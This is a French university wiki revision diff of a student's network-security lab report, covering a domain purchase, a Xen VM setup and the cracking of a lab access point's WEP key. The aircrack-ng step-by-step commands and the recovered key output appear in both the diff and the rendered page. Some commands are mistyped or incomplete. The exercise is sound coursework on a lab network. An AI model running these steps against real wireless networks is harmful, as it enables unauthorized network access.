TP sysres IMA5sc 2019/2020 G6 : Différence entre versions

De Wiki d'activités IMA
(Choix du nom de domaine)
(cassage de la clef WEP d'un point d'accès Wifi)
Ligne 17 : Ligne 17 :
 
===cassage de la clef WEP d'un point d'accès Wifi===
 
===cassage de la clef WEP d'un point d'accès Wifi===
  
Cette partie a été réalisé sur une machine surlaquelle on a branché une clé WIFI.
+
Cette partie a été réalisé sur une machine sur laquelle on a branché une clé WIFI.
  
Tout d'abord j'ai commencé par installé aircrack. C'est l'outils qui me serrvira a réalisé le crackage des clefs.
+
J'ai commencé par installé aircrack, l'outil qui me servira à cracker les différentes clefs.
  
Ensuite j'ai crée l'interface wlan0. Elle me servira à recuperer les paquets que je souhaite capturer.
+
je commence par créer l'interface wlan0 avec laquelle je vais récupérer les paquets que je souhaite capturer.
  
 
Pour créer cet interface je lance la commande:
 
Pour créer cet interface je lance la commande:
   airmon-ng wlan0mon
+
   airmon-ng start wlan0mon
   airdump-ng --bssid  04:DA:D2:9C:50:55
+
Ensuite j'observe les BSSID qui circulent sur le réseau:
 +
  airodump-ng --encrypt wep wlan0mon
 +
 +
Je copie les paquets qui circulent sur cracotte06 et je les sauvegardent dans mon fichier craquage.txt
 +
   airodump-ng craquag.txt -c 2 --bssid  04:DA:D2:9C:50:55 wlan0mon
 +
 
 +
Enfin je réalise le cassage de la clef:
 +
  aircrack-ng craquage.txt.cap
 +
 
 +
Pour décrypter la clef il a fallu capturer 30 000 paquets et testé 673 clefs ce qui aura pris  5 minutes.
 +
      KEY FOUND! [F1:CA:C4:00:00:00:00:00:00:00:99:99:99]
 +
      Decrypted correctly:100%
  
 
==4eme seance==
 
==4eme seance==

Version du 25 novembre 2019 à 22:37

1ère séance

Choix du nom de domaine

Sur le site gandi.net, j'ai acheté le nom de mon domaine qui est: blennoragie.site.

Installation de la machine virtuelle Xen

Via une connection en SSH à cordouan.insecserv.deule.net, j'ai installé l'image de la machine virtuelle Xen par la commande suivante

   xen-create-image --hostname=blennoragie --dhcp -- dir=/usr/local/xen

le paramètre hostname spécifie le nom de ma machine(blennoragie) et les disques virtuels sont stockés dans le repertoire(/usr/local/xen):


L'adresse MAC obtenue est : 00:16:3E:D6:E1:DF

2ème séance

cassage de la clef WEP d'un point d'accès Wifi

Cette partie a été réalisé sur une machine sur laquelle on a branché une clé WIFI.

J'ai commencé par installé aircrack, l'outil qui me servira à cracker les différentes clefs.

je commence par créer l'interface wlan0 avec laquelle je vais récupérer les paquets que je souhaite capturer.

Pour créer cet interface je lance la commande:

 airmon-ng start wlan0mon

Ensuite j'observe les BSSID qui circulent sur le réseau:

  airodump-ng --encrypt wep wlan0mon

Je copie les paquets qui circulent sur cracotte06 et je les sauvegardent dans mon fichier craquage.txt

  airodump-ng craquag.txt -c 2 --bssid  04:DA:D2:9C:50:55 wlan0mon

Enfin je réalise le cassage de la clef:

  aircrack-ng craquage.txt.cap

Pour décrypter la clef il a fallu capturer 30 000 paquets et testé 673 clefs ce qui aura pris 5 minutes.

     KEY FOUND! [F1:CA:C4:00:00:00:00:00:00:00:99:99:99]
     Decrypted correctly:100%

4eme seance

5ème seance

2ème séance

cassage de la clef WEP d'un point accès Wifi